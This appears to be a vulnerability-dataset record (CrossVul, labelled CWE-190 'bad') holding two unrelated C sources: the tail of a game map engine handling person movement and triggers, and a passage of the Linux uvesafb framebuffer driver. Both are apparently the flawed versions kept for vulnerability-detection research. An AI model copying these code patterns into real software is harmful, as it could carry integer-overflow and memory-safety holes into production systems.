person_queue_command(person, COMMAND_ANIMATE, false);
break;
case 3: // south
person_queue_command(person, COMMAND_MOVE_SOUTH, true);
person_queue_command(person, COMMAND_FACE_SOUTH, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case 2: // southwest
person_queue_command(person, COMMAND_MOVE_SOUTHWEST, true);
person_queue_command(person, COMMAND_FACE_SOUTHWEST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case -1: // west
person_queue_command(person, COMMAND_MOVE_WEST, true);
person_queue_command(person, COMMAND_FACE_WEST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case -4: // northwest
person_queue_command(person, COMMAND_MOVE_NORTHWEST, true);
person_queue_command(person, COMMAND_FACE_NORTHWEST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
}
}
}
update_bound_keys(true);
}
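// record_step: pushes the person's current position onto the front of its step
// history, shifting older entries back. the history must be at least as long as the
// largest follow distance among the person's followers (see enlarge_step_history).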
static void
record_step(person_t* person)
{
struct step* p_step;
if (person->max_history <= 0)
return;
memmove(&person->steps[1], &person->steps[0], (person->max_history - 1) * sizeof(struct step));
p_step = &person->steps[0];
p_step->x = person->x;
p_step->y = person->y;
}
static void
reset_persons(bool keep_existing)
{
unsigned int id;
point3_t origin;
person_t* person;
int i, j;
origin = map_origin();
for (i = 0; i < s_num_persons; ++i) {
person = s_persons[i];
id = person->id;
if (!keep_existing)
person->num_commands = 0;
if (person->is_persistent || keep_existing) {
person->x = origin.x;
person->y = origin.y;
person->layer = origin.z;
}
else {
person_activate(person, PERSON_SCRIPT_ON_DESTROY, NULL, true);
free_person(person);
--s_num_persons;
for (j = i; j < s_num_persons; ++j)
s_persons[j] = s_persons[j + 1];
--i;
}
}
sort_persons();
}
static void
set_person_name(person_t* person, const char* name)
{
person->name = realloc(person->name, (strlen(name) + 1) * sizeof(char));
strcpy(person->name, name);
}
static void
sort_persons(void)
{
qsort(s_persons, s_num_persons, sizeof(person_t*), compare_persons);
}
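// update_map_engine: advances the map simulation by one frame: animates the tileset,
// updates non-follower persons, interpolates the color-mask fade, re-centers the
// camera on the subject person, fires edge scripts (main loop only, non-repeating
// maps), checks triggers and zones for each input person, runs deferred scripts that
// have come due, and finally invokes the global update script.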
static void
update_map_engine(bool in_main_loop)
{
bool has_moved;
int index;
bool is_sort_needed = false;
int last_trigger;
int last_zone;
int layer;
int map_w, map_h;
int num_zone_steps;
script_t* script_to_run;
int script_type;
double start_x[PLAYER_MAX];
double start_y[PLAYER_MAX];
int tile_w, tile_h;
struct map_trigger* trigger;
double x, y, px, py;
struct map_zone* zone;
int i, j, k;
++s_frames;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
map_w = s_map->width * tile_w;
map_h = s_map->height * tile_h;
tileset_update(s_map->tileset);
for (i = 0; i < PLAYER_MAX; ++i) if (s_players[i].person != NULL)
person_get_xy(s_players[i].person, &start_x[i], &start_y[i], false);
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i]->leader != NULL)
continue; // skip followers for now
update_person(s_persons[i], &has_moved);
is_sort_needed |= has_moved;
}
if (is_sort_needed)
sort_persons();
// update color mask fade level
if (s_fade_progress < s_fade_frames) {
++s_fade_progress;
s_color_mask = color_mix(s_fade_color_to, s_fade_color_from,
s_fade_progress, s_fade_frames - s_fade_progress);
}
// update camera
if (s_camera_person != NULL) {
person_get_xy(s_camera_person, &x, &y, true);
s_camera_x = x; s_camera_y = y;
}
// run edge script if the camera has moved past the edge of the map
// note: only applies for non-repeating maps
if (in_main_loop && !s_map->is_repeating) {
script_type = s_camera_y < 0 ? MAP_SCRIPT_ON_LEAVE_NORTH
: s_camera_x >= map_w ? MAP_SCRIPT_ON_LEAVE_EAST
: s_camera_y >= map_h ? MAP_SCRIPT_ON_LEAVE_SOUTH
: s_camera_x < 0 ? MAP_SCRIPT_ON_LEAVE_WEST
: MAP_SCRIPT_MAX;
if (script_type < MAP_SCRIPT_MAX)
map_activate(script_type, true);
}
// if there are any input persons, check for trigger activation
for (i = 0; i < PLAYER_MAX; ++i) if (s_players[i].person != NULL) {
// did we step on a trigger or move to a new one?
person_get_xyz(s_players[i].person, &x, &y, &layer, true);
trigger = get_trigger_at(x, y, layer, &index);
if (trigger != s_on_trigger) {
last_trigger = s_current_trigger;
s_current_trigger = index;
s_on_trigger = trigger;
if (trigger != NULL)
script_run(trigger->script, false);
s_current_trigger = last_trigger;
}
}
// update any zones occupied by the input person
// note: a zone's step count is in reality a pixel count, so a zone
// may be updated multiple times in a single frame.
for (k = 0; k < PLAYER_MAX; ++k) if (s_players[k].person != NULL) {
person_get_xy(s_players[k].person, &x, &y, false);
px = fabs(x - start_x[k]);
py = fabs(y - start_y[k]);
num_zone_steps = px > py ? px : py;
for (i = 0; i < num_zone_steps; ++i) {
j = 0;
while ((zone = get_zone_at(x, y, layer, j++, &index))) {
if (zone->steps_left-- <= 0) {
last_zone = s_current_zone;
s_current_zone = index;
zone->steps_left = zone->interval;
script_run(zone->script, true);
s_current_zone = last_zone;
}
}
}
}
// check if there are any deferred scripts due to run this frame
// and run the ones that are
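// note: each entry is taken off the list *before* its script runs; the script
// reference is released once it has finished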
for (i = 0; i < s_num_deferreds; ++i) {
if (s_deferreds[i].frames_left-- <= 0) {
script_to_run = s_deferreds[i].script;
for (j = i; j < s_num_deferreds - 1; ++j)
s_deferreds[j] = s_deferreds[j + 1];
--s_num_deferreds;
script_run(script_to_run, false);
script_unref(script_to_run);
--i;
}
}
// now that everything else is in order, we can run the
// update script!
script_run(s_update_script, false);
}
static void
update_person(person_t* person, bool* out_has_moved)
{
struct command command;
double delta_x, delta_y;
int facing;
bool has_moved;
bool is_finished;
const person_t* last_person;
struct step step;
int vector;
int i;
person->mv_x = 0; person->mv_y = 0;
if (person->revert_frames > 0 && --person->revert_frames <= 0)
person->frame = 0;
if (person->leader == NULL) { // no leader; use command queue
// call the command generator if the queue is empty
if (person->num_commands == 0)
person_activate(person, PERSON_SCRIPT_GENERATOR, NULL, true);
// run through the queue, stopping after the first non-immediate command
is_finished = !does_person_exist(person) || person->num_commands == 0;
while (!is_finished) {
command = person->commands[0];
--person->num_commands;
for (i = 0; i < person->num_commands; ++i)
person->commands[i] = person->commands[i + 1];
last_person = s_current_person;
s_current_person = person;
if (command.type != COMMAND_RUN_SCRIPT)
command_person(person, command.type);
else
script_run(command.script, false);
s_current_person = last_person;
script_unref(command.script);
is_finished = !does_person_exist(person) // stop if person was destroyed
|| !command.is_immediate || person->num_commands == 0;
}
}
else { // leader set; follow the leader!
step = person->leader->steps[person->follow_distance - 1];
delta_x = step.x - person->x;
delta_y = step.y - person->y;
if (fabs(delta_x) > person->speed_x)
command_person(person, delta_x > 0 ? COMMAND_MOVE_EAST : COMMAND_MOVE_WEST);
if (!does_person_exist(person)) return;
if (fabs(delta_y) > person->speed_y)
command_person(person, delta_y > 0 ? COMMAND_MOVE_SOUTH : COMMAND_MOVE_NORTH);
if (!does_person_exist(person)) return;
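// person->mv_x/mv_y reflect the movement commands issued above; reuse the same
// (mv_x + mv_y * 3) encoding as the player input handler to pick the facing,
// falling back to COMMAND_WAIT when the follower did not actually move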
vector = person->mv_x + person->mv_y * 3;
facing = vector == -3 ? COMMAND_FACE_NORTH
: vector == -2 ? COMMAND_FACE_NORTHEAST
: vector == 1 ? COMMAND_FACE_EAST
: vector == 4 ? COMMAND_FACE_SOUTHEAST
: vector == 3 ? COMMAND_FACE_SOUTH
: vector == 2 ? COMMAND_FACE_SOUTHWEST
: vector == -1 ? COMMAND_FACE_WEST
: vector == -4 ? COMMAND_FACE_NORTHWEST
: COMMAND_WAIT;
if (facing != COMMAND_WAIT)
command_person(person, COMMAND_ANIMATE);
if (!does_person_exist(person)) return;
command_person(person, facing);
}
// check that the person didn't mysteriously disappear...
if (!does_person_exist(person))
return; // they probably got eaten by a pig.
// if the person's position changed, record it in their step history
*out_has_moved = person_has_moved(person);
if (*out_has_moved)
record_step(person);
// recursively update the follower chain
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i]->leader != person)
continue;
update_person(s_persons[i], &has_moved);
*out_has_moved |= has_moved;
}
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_35_0 |
crossvul-cpp_data_bad_222_0 | /*
* A framebuffer driver for VBE 2.0+ compliant video cards
*
* (c) 2007 Michal Januszewski <spock@gentoo.org>
* Loosely based upon the vesafb driver.
*
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/init.h>
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/skbuff.h>
#include <linux/timer.h>
#include <linux/completion.h>
#include <linux/connector.h>
#include <linux/random.h>
#include <linux/platform_device.h>
#include <linux/limits.h>
#include <linux/fb.h>
#include <linux/io.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <video/edid.h>
#include <video/uvesafb.h>
#ifdef CONFIG_X86
#include <video/vga.h>
#endif
#include "edid.h"
static struct cb_id uvesafb_cn_id = {
.idx = CN_IDX_V86D,
.val = CN_VAL_V86D_UVESAFB
};
static char v86d_path[PATH_MAX] = "/sbin/v86d";
static char v86d_started; /* has v86d been started by uvesafb? */
static const struct fb_fix_screeninfo uvesafb_fix = {
.id = "VESA VGA",
.type = FB_TYPE_PACKED_PIXELS,
.accel = FB_ACCEL_NONE,
.visual = FB_VISUAL_TRUECOLOR,
};
static int mtrr = 3; /* enable mtrr by default */
static bool blank = 1; /* enable blanking by default */
static int ypan = 1; /* 0: scroll, 1: ypan, 2: ywrap */
static bool pmi_setpal = true; /* use PMI for palette changes */
static bool nocrtc; /* ignore CRTC settings */
static bool noedid; /* don't try DDC transfers */
static int vram_remap; /* set amt. of memory to be used */
static int vram_total; /* set total amount of memory */
static u16 maxclk; /* maximum pixel clock */
static u16 maxvf; /* maximum vertical frequency */
static u16 maxhf; /* maximum horizontal frequency */
static u16 vbemode; /* force use of a specific VBE mode */
static char *mode_option;
static u8 dac_width = 6;
static struct uvesafb_ktask *uvfb_tasks[UVESAFB_TASKS_MAX];
static DEFINE_MUTEX(uvfb_lock);
/*
* A handler for replies from userspace.
*
* Make sure each message passes consistency checks and if it does,
* find the kernel part of the task struct, copy the registers and
* the buffer contents and then complete the task.
*/
static void uvesafb_cn_callback(struct cn_msg *msg, struct netlink_skb_parms *nsp)
{
struct uvesafb_task *utask;
struct uvesafb_ktask *task;
if (!capable(CAP_SYS_ADMIN))
return;
if (msg->seq >= UVESAFB_TASKS_MAX)
return;
mutex_lock(&uvfb_lock);
task = uvfb_tasks[msg->seq];
if (!task || msg->ack != task->ack) {
mutex_unlock(&uvfb_lock);
return;
}
utask = (struct uvesafb_task *)msg->data;
/* Sanity checks for the buffer length. */
if (task->t.buf_len < utask->buf_len ||
utask->buf_len > msg->len - sizeof(*utask)) {
mutex_unlock(&uvfb_lock);
return;
}
uvfb_tasks[msg->seq] = NULL;
mutex_unlock(&uvfb_lock);
memcpy(&task->t, utask, sizeof(*utask));
if (task->t.buf_len && task->buf)
memcpy(task->buf, utask + 1, task->t.buf_len);
complete(task->done);
return;
}
static int uvesafb_helper_start(void)
{
char *envp[] = {
"HOME=/",
"PATH=/sbin:/bin",
NULL,
};
char *argv[] = {
v86d_path,
NULL,
};
return call_usermodehelper(v86d_path, argv, envp, UMH_WAIT_PROC);
}
/*
* Execute a uvesafb task.
*
* Returns 0 if the task is executed successfully.
*
* A message sent to the userspace consists of the uvesafb_task
* struct and (optionally) a buffer. The uvesafb_task struct is
* a simplified version of uvesafb_ktask (its kernel counterpart)
* containing only the register values, flags and the length of
* the buffer.
*
* Each message is assigned a sequence number (increased linearly)
* and a random ack number. The sequence number is used as a key
* for the uvfb_tasks array which holds pointers to uvesafb_ktask
* structs for all requests.
*/
static int uvesafb_exec(struct uvesafb_ktask *task)
{
static int seq;
struct cn_msg *m;
int err;
int len = sizeof(task->t) + task->t.buf_len;
/*
* Check whether the message isn't longer than the maximum
* allowed by connector.
*/
if (sizeof(*m) + len > CONNECTOR_MAX_MSG_SIZE) {
pr_warn("message too long (%d), can't execute task\n",
(int)(sizeof(*m) + len));
return -E2BIG;
}
m = kzalloc(sizeof(*m) + len, GFP_KERNEL);
if (!m)
return -ENOMEM;
init_completion(task->done);
memcpy(&m->id, &uvesafb_cn_id, sizeof(m->id));
m->seq = seq;
m->len = len;
m->ack = prandom_u32();
/* uvesafb_task structure */
memcpy(m + 1, &task->t, sizeof(task->t));
/* Buffer */
memcpy((u8 *)(m + 1) + sizeof(task->t), task->buf, task->t.buf_len);
/*
* Save the message ack number so that we can find the kernel
* part of this task when a reply is received from userspace.
*/
task->ack = m->ack;
mutex_lock(&uvfb_lock);
/* If all slots are taken -- bail out. */
if (uvfb_tasks[seq]) {
mutex_unlock(&uvfb_lock);
err = -EBUSY;
goto out;
}
/* Save a pointer to the kernel part of the task struct. */
uvfb_tasks[seq] = task;
mutex_unlock(&uvfb_lock);
err = cn_netlink_send(m, 0, 0, GFP_KERNEL);
if (err == -ESRCH) {
/*
* Try to start the userspace helper if sending
* the request failed the first time.
*/
err = uvesafb_helper_start();
if (err) {
pr_err("failed to execute %s\n", v86d_path);
pr_err("make sure that the v86d helper is installed and executable\n");
} else {
v86d_started = 1;
err = cn_netlink_send(m, 0, 0, gfp_any());
if (err == -ENOBUFS)
err = 0;
}
} else if (err == -ENOBUFS)
err = 0;
if (!err && !(task->t.flags & TF_EXIT))
err = !wait_for_completion_timeout(task->done,
msecs_to_jiffies(UVESAFB_TIMEOUT));
mutex_lock(&uvfb_lock);
uvfb_tasks[seq] = NULL;
mutex_unlock(&uvfb_lock);
seq++;
if (seq >= UVESAFB_TASKS_MAX)
seq = 0;
out:
kfree(m);
return err;
}
/*
* Free a uvesafb_ktask struct.
*/
static void uvesafb_free(struct uvesafb_ktask *task)
{
if (task) {
kfree(task->done);
kfree(task);
}
}
/*
* Prepare a uvesafb_ktask struct to be used again.
*/
static void uvesafb_reset(struct uvesafb_ktask *task)
{
struct completion *cpl = task->done;
memset(task, 0, sizeof(*task));
task->done = cpl;
}
/*
* Allocate and prepare a uvesafb_ktask struct.
*/
static struct uvesafb_ktask *uvesafb_prep(void)
{
struct uvesafb_ktask *task;
task = kzalloc(sizeof(*task), GFP_KERNEL);
if (task) {
task->done = kzalloc(sizeof(*task->done), GFP_KERNEL);
if (!task->done) {
kfree(task);
task = NULL;
}
}
return task;
}
static void uvesafb_setup_var(struct fb_var_screeninfo *var,
struct fb_info *info, struct vbe_mode_ib *mode)
{
struct uvesafb_par *par = info->par;
var->vmode = FB_VMODE_NONINTERLACED;
var->sync = FB_SYNC_VERT_HIGH_ACT;
var->xres = mode->x_res;
var->yres = mode->y_res;
var->xres_virtual = mode->x_res;
var->yres_virtual = (par->ypan) ?
info->fix.smem_len / mode->bytes_per_scan_line :
mode->y_res;
var->xoffset = 0;
var->yoffset = 0;
var->bits_per_pixel = mode->bits_per_pixel;
if (var->bits_per_pixel == 15)
var->bits_per_pixel = 16;
if (var->bits_per_pixel > 8) {
var->red.offset = mode->red_off;
var->red.length = mode->red_len;
var->green.offset = mode->green_off;
var->green.length = mode->green_len;
var->blue.offset = mode->blue_off;
var->blue.length = mode->blue_len;
var->transp.offset = mode->rsvd_off;
var->transp.length = mode->rsvd_len;
} else {
var->red.offset = 0;
var->green.offset = 0;
var->blue.offset = 0;
var->transp.offset = 0;
var->red.length = 8;
var->green.length = 8;
var->blue.length = 8;
var->transp.length = 0;
}
}
static int uvesafb_vbe_find_mode(struct uvesafb_par *par,
int xres, int yres, int depth, unsigned char flags)
{
int i, match = -1, h = 0, d = 0x7fffffff;
for (i = 0; i < par->vbe_modes_cnt; i++) {
h = abs(par->vbe_modes[i].x_res - xres) +
abs(par->vbe_modes[i].y_res - yres) +
abs(depth - par->vbe_modes[i].depth);
/*
* We have an exact match in terms of resolution
* and depth.
*/
if (h == 0)
return i;
if (h < d || (h == d && par->vbe_modes[i].depth > depth)) {
d = h;
match = i;
}
}
i = 1;
if (flags & UVESAFB_EXACT_DEPTH &&
par->vbe_modes[match].depth != depth)
i = 0;
if (flags & UVESAFB_EXACT_RES && d > 24)
i = 0;
if (i != 0)
return match;
else
return -1;
}
static u8 *uvesafb_vbe_state_save(struct uvesafb_par *par)
{
struct uvesafb_ktask *task;
u8 *state;
int err;
if (!par->vbe_state_size)
return NULL;
state = kmalloc(par->vbe_state_size, GFP_KERNEL);
if (!state)
return ERR_PTR(-ENOMEM);
task = uvesafb_prep();
if (!task) {
kfree(state);
return NULL;
}
task->t.regs.eax = 0x4f04;
task->t.regs.ecx = 0x000f;
task->t.regs.edx = 0x0001;
task->t.flags = TF_BUF_RET | TF_BUF_ESBX;
task->t.buf_len = par->vbe_state_size;
task->buf = state;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
pr_warn("VBE get state call failed (eax=0x%x, err=%d)\n",
task->t.regs.eax, err);
kfree(state);
state = NULL;
}
uvesafb_free(task);
return state;
}
static void uvesafb_vbe_state_restore(struct uvesafb_par *par, u8 *state_buf)
{
struct uvesafb_ktask *task;
int err;
if (!state_buf)
return;
task = uvesafb_prep();
if (!task)
return;
task->t.regs.eax = 0x4f04;
task->t.regs.ecx = 0x000f;
task->t.regs.edx = 0x0002;
task->t.buf_len = par->vbe_state_size;
task->t.flags = TF_BUF_ESBX;
task->buf = state_buf;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f)
pr_warn("VBE state restore call failed (eax=0x%x, err=%d)\n",
task->t.regs.eax, err);
uvesafb_free(task);
}
static int uvesafb_vbe_getinfo(struct uvesafb_ktask *task,
struct uvesafb_par *par)
{
int err;
task->t.regs.eax = 0x4f00;
task->t.flags = TF_VBEIB;
task->t.buf_len = sizeof(struct vbe_ib);
task->buf = &par->vbe_ib;
strncpy(par->vbe_ib.vbe_signature, "VBE2", 4);
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
pr_err("Getting VBE info block failed (eax=0x%x, err=%d)\n",
(u32)task->t.regs.eax, err);
return -EINVAL;
}
if (par->vbe_ib.vbe_version < 0x0200) {
pr_err("Sorry, pre-VBE 2.0 cards are not supported\n");
return -EINVAL;
}
if (!par->vbe_ib.mode_list_ptr) {
pr_err("Missing mode list!\n");
return -EINVAL;
}
pr_info("");
/*
* Convert string pointers and the mode list pointer into
* usable addresses. Print informational messages about the
* video adapter and its vendor.
*/
if (par->vbe_ib.oem_vendor_name_ptr)
pr_cont("%s, ",
((char *)task->buf) + par->vbe_ib.oem_vendor_name_ptr);
if (par->vbe_ib.oem_product_name_ptr)
pr_cont("%s, ",
((char *)task->buf) + par->vbe_ib.oem_product_name_ptr);
if (par->vbe_ib.oem_product_rev_ptr)
pr_cont("%s, ",
((char *)task->buf) + par->vbe_ib.oem_product_rev_ptr);
if (par->vbe_ib.oem_string_ptr)
pr_cont("OEM: %s, ",
((char *)task->buf) + par->vbe_ib.oem_string_ptr);
pr_cont("VBE v%d.%d\n",
(par->vbe_ib.vbe_version & 0xff00) >> 8,
par->vbe_ib.vbe_version & 0xff);
return 0;
}
static int uvesafb_vbe_getmodes(struct uvesafb_ktask *task,
struct uvesafb_par *par)
{
int off = 0, err;
u16 *mode;
par->vbe_modes_cnt = 0;
/* Count available modes. */
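/*
 * mode_list_ptr is treated here as an offset from the start of the VBE
 * info block (cf. the pointer conversion note in uvesafb_vbe_getinfo);
 * the list itself is a 0xffff-terminated array of u16 mode IDs stored
 * inside par->vbe_ib.
 */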
mode = (u16 *) (((u8 *)&par->vbe_ib) + par->vbe_ib.mode_list_ptr);
while (*mode != 0xffff) {
par->vbe_modes_cnt++;
mode++;
}
par->vbe_modes = kzalloc(sizeof(struct vbe_mode_ib) *
par->vbe_modes_cnt, GFP_KERNEL);
if (!par->vbe_modes)
return -ENOMEM;
/* Get info about all available modes. */
mode = (u16 *) (((u8 *)&par->vbe_ib) + par->vbe_ib.mode_list_ptr);
while (*mode != 0xffff) {
struct vbe_mode_ib *mib;
uvesafb_reset(task);
task->t.regs.eax = 0x4f01;
task->t.regs.ecx = (u32) *mode;
task->t.flags = TF_BUF_RET | TF_BUF_ESDI;
task->t.buf_len = sizeof(struct vbe_mode_ib);
task->buf = par->vbe_modes + off;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
pr_warn("Getting mode info block for mode 0x%x failed (eax=0x%x, err=%d)\n",
*mode, (u32)task->t.regs.eax, err);
mode++;
par->vbe_modes_cnt--;
continue;
}
mib = task->buf;
mib->mode_id = *mode;
/*
* We only want modes that are supported with the current
* hardware configuration, color, graphics and that have
* support for the LFB.
*/
if ((mib->mode_attr & VBE_MODE_MASK) == VBE_MODE_MASK &&
mib->bits_per_pixel >= 8)
off++;
else
par->vbe_modes_cnt--;
mode++;
mib->depth = mib->red_len + mib->green_len + mib->blue_len;
/*
* Handle 8bpp modes and modes with broken color component
* lengths.
*/
if (mib->depth == 0 || (mib->depth == 24 &&
mib->bits_per_pixel == 32))
mib->depth = mib->bits_per_pixel;
}
if (par->vbe_modes_cnt > 0)
return 0;
else
return -EINVAL;
}
/*
* The Protected Mode Interface is 32-bit x86 code, so we only run it on
* x86 and not x86_64.
*/
#ifdef CONFIG_X86_32
static int uvesafb_vbe_getpmi(struct uvesafb_ktask *task,
struct uvesafb_par *par)
{
int i, err;
uvesafb_reset(task);
task->t.regs.eax = 0x4f0a;
task->t.regs.ebx = 0x0;
err = uvesafb_exec(task);
if ((task->t.regs.eax & 0xffff) != 0x4f || task->t.regs.es < 0xc000) {
par->pmi_setpal = par->ypan = 0;
} else {
par->pmi_base = (u16 *)phys_to_virt(((u32)task->t.regs.es << 4)
+ task->t.regs.edi);
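/*
 * The PMI table starts with 16-bit offsets into itself: entry 1 is the
 * "set display start" routine, entry 2 the "set palette" routine, and
 * entry 3, if non-zero, the offset of a 0xffff-terminated list of I/O
 * ports the routines may touch.
 */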
par->pmi_start = (u8 *)par->pmi_base + par->pmi_base[1];
par->pmi_pal = (u8 *)par->pmi_base + par->pmi_base[2];
pr_info("protected mode interface info at %04x:%04x\n",
(u16)task->t.regs.es, (u16)task->t.regs.edi);
pr_info("pmi: set display start = %p, set palette = %p\n",
par->pmi_start, par->pmi_pal);
if (par->pmi_base[3]) {
pr_info("pmi: ports =");
for (i = par->pmi_base[3]/2;
par->pmi_base[i] != 0xffff; i++)
pr_cont(" %x", par->pmi_base[i]);
pr_cont("\n");
if (par->pmi_base[i] != 0xffff) {
pr_info("can't handle memory requests, pmi disabled\n");
par->ypan = par->pmi_setpal = 0;
}
}
}
return 0;
}
#endif /* CONFIG_X86_32 */
/*
* Check whether a video mode is supported by the Video BIOS and is
* compatible with the monitor limits.
*/
static int uvesafb_is_valid_mode(struct fb_videomode *mode,
struct fb_info *info)
{
if (info->monspecs.gtf) {
fb_videomode_to_var(&info->var, mode);
if (fb_validate_mode(&info->var, info))
return 0;
}
if (uvesafb_vbe_find_mode(info->par, mode->xres, mode->yres, 8,
UVESAFB_EXACT_RES) == -1)
return 0;
return 1;
}
static int uvesafb_vbe_getedid(struct uvesafb_ktask *task, struct fb_info *info)
{
struct uvesafb_par *par = info->par;
int err = 0;
if (noedid || par->vbe_ib.vbe_version < 0x0300)
return -EINVAL;
task->t.regs.eax = 0x4f15;
task->t.regs.ebx = 0;
task->t.regs.ecx = 0;
task->t.buf_len = 0;
task->t.flags = 0;
err = uvesafb_exec(task);
if ((task->t.regs.eax & 0xffff) != 0x004f || err)
return -EINVAL;
if ((task->t.regs.ebx & 0x3) == 3) {
pr_info("VBIOS/hardware supports both DDC1 and DDC2 transfers\n");
} else if ((task->t.regs.ebx & 0x3) == 2) {
pr_info("VBIOS/hardware supports DDC2 transfers\n");
} else if ((task->t.regs.ebx & 0x3) == 1) {
pr_info("VBIOS/hardware supports DDC1 transfers\n");
} else {
pr_info("VBIOS/hardware doesn't support DDC transfers\n");
return -EINVAL;
}
task->t.regs.eax = 0x4f15;
task->t.regs.ebx = 1;
task->t.regs.ecx = task->t.regs.edx = 0;
task->t.flags = TF_BUF_RET | TF_BUF_ESDI;
task->t.buf_len = EDID_LENGTH;
task->buf = kzalloc(EDID_LENGTH, GFP_KERNEL);
if (!task->buf)
return -ENOMEM;
err = uvesafb_exec(task);
if ((task->t.regs.eax & 0xffff) == 0x004f && !err) {
fb_edid_to_monspecs(task->buf, &info->monspecs);
if (info->monspecs.vfmax && info->monspecs.hfmax) {
/*
* If the maximum pixel clock wasn't specified in
* the EDID block, set it to 300 MHz.
*/
if (info->monspecs.dclkmax == 0)
info->monspecs.dclkmax = 300 * 1000000;
info->monspecs.gtf = 1;
}
} else {
err = -EINVAL;
}
kfree(task->buf);
return err;
}
static void uvesafb_vbe_getmonspecs(struct uvesafb_ktask *task,
struct fb_info *info)
{
struct uvesafb_par *par = info->par;
int i;
memset(&info->monspecs, 0, sizeof(info->monspecs));
/*
* If we don't get all necessary data from the EDID block,
* mark it as incompatible with the GTF and set nocrtc so
* that we always use the default BIOS refresh rate.
*/
if (uvesafb_vbe_getedid(task, info)) {
info->monspecs.gtf = 0;
par->nocrtc = 1;
}
/* Kernel command line overrides. */
if (maxclk)
info->monspecs.dclkmax = maxclk * 1000000;
if (maxvf)
info->monspecs.vfmax = maxvf;
if (maxhf)
info->monspecs.hfmax = maxhf * 1000;
/*
* In case DDC transfers are not supported, the user can provide
* monitor limits manually. Lower limits are set to "safe" values.
*/
if (info->monspecs.gtf == 0 && maxclk && maxvf && maxhf) {
info->monspecs.dclkmin = 0;
info->monspecs.vfmin = 60;
info->monspecs.hfmin = 29000;
info->monspecs.gtf = 1;
par->nocrtc = 0;
}
if (info->monspecs.gtf)
pr_info("monitor limits: vf = %d Hz, hf = %d kHz, clk = %d MHz\n",
info->monspecs.vfmax,
(int)(info->monspecs.hfmax / 1000),
(int)(info->monspecs.dclkmax / 1000000));
else
pr_info("no monitor limits have been set, default refresh rate will be used\n");
/* Add VBE modes to the modelist. */
for (i = 0; i < par->vbe_modes_cnt; i++) {
struct fb_var_screeninfo var;
struct vbe_mode_ib *mode;
struct fb_videomode vmode;
mode = &par->vbe_modes[i];
memset(&var, 0, sizeof(var));
var.xres = mode->x_res;
var.yres = mode->y_res;
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60, &var, info);
fb_var_to_videomode(&vmode, &var);
fb_add_videomode(&vmode, &info->modelist);
}
/* Add valid VESA modes to our modelist. */
for (i = 0; i < VESA_MODEDB_SIZE; i++) {
if (uvesafb_is_valid_mode((struct fb_videomode *)
&vesa_modes[i], info))
fb_add_videomode(&vesa_modes[i], &info->modelist);
}
for (i = 0; i < info->monspecs.modedb_len; i++) {
if (uvesafb_is_valid_mode(&info->monspecs.modedb[i], info))
fb_add_videomode(&info->monspecs.modedb[i],
&info->modelist);
}
return;
}
static void uvesafb_vbe_getstatesize(struct uvesafb_ktask *task,
struct uvesafb_par *par)
{
int err;
uvesafb_reset(task);
/*
* Get the VBE state buffer size. We want all available
* hardware state data (CL = 0x0f).
*/
task->t.regs.eax = 0x4f04;
task->t.regs.ecx = 0x000f;
task->t.regs.edx = 0x0000;
task->t.flags = 0;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
pr_warn("VBE state buffer size cannot be determined (eax=0x%x, err=%d)\n",
task->t.regs.eax, err);
par->vbe_state_size = 0;
return;
}
par->vbe_state_size = 64 * (task->t.regs.ebx & 0xffff);
}
static int uvesafb_vbe_init(struct fb_info *info)
{
struct uvesafb_ktask *task = NULL;
struct uvesafb_par *par = info->par;
int err;
task = uvesafb_prep();
if (!task)
return -ENOMEM;
err = uvesafb_vbe_getinfo(task, par);
if (err)
goto out;
err = uvesafb_vbe_getmodes(task, par);
if (err)
goto out;
par->nocrtc = nocrtc;
#ifdef CONFIG_X86_32
par->pmi_setpal = pmi_setpal;
par->ypan = ypan;
if (par->pmi_setpal || par->ypan) {
if (__supported_pte_mask & _PAGE_NX) {
par->pmi_setpal = par->ypan = 0;
pr_warn("NX protection is active, better not use the PMI\n");
} else {
uvesafb_vbe_getpmi(task, par);
}
}
#else
/* The protected mode interface is not available on non-x86. */
par->pmi_setpal = par->ypan = 0;
#endif
INIT_LIST_HEAD(&info->modelist);
uvesafb_vbe_getmonspecs(task, info);
uvesafb_vbe_getstatesize(task, par);
out: uvesafb_free(task);
return err;
}
static int uvesafb_vbe_init_mode(struct fb_info *info)
{
struct list_head *pos;
struct fb_modelist *modelist;
struct fb_videomode *mode;
struct uvesafb_par *par = info->par;
int i, modeid;
/* Has the user requested a specific VESA mode? */
if (vbemode) {
for (i = 0; i < par->vbe_modes_cnt; i++) {
if (par->vbe_modes[i].mode_id == vbemode) {
modeid = i;
uvesafb_setup_var(&info->var, info,
&par->vbe_modes[modeid]);
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60,
&info->var, info);
/*
* With pixclock set to 0, the default BIOS
* timings will be used in set_par().
*/
info->var.pixclock = 0;
goto gotmode;
}
}
pr_info("requested VBE mode 0x%x is unavailable\n", vbemode);
vbemode = 0;
}
/* Count the modes in the modelist */
i = 0;
list_for_each(pos, &info->modelist)
i++;
/*
* Convert the modelist into a modedb so that we can use it with
* fb_find_mode().
*/
mode = kzalloc(i * sizeof(*mode), GFP_KERNEL);
if (mode) {
i = 0;
list_for_each(pos, &info->modelist) {
modelist = list_entry(pos, struct fb_modelist, list);
mode[i] = modelist->mode;
i++;
}
if (!mode_option)
mode_option = UVESAFB_DEFAULT_MODE;
i = fb_find_mode(&info->var, info, mode_option, mode, i,
NULL, 8);
kfree(mode);
}
/* fb_find_mode() failed */
if (i == 0) {
info->var.xres = 640;
info->var.yres = 480;
mode = (struct fb_videomode *)
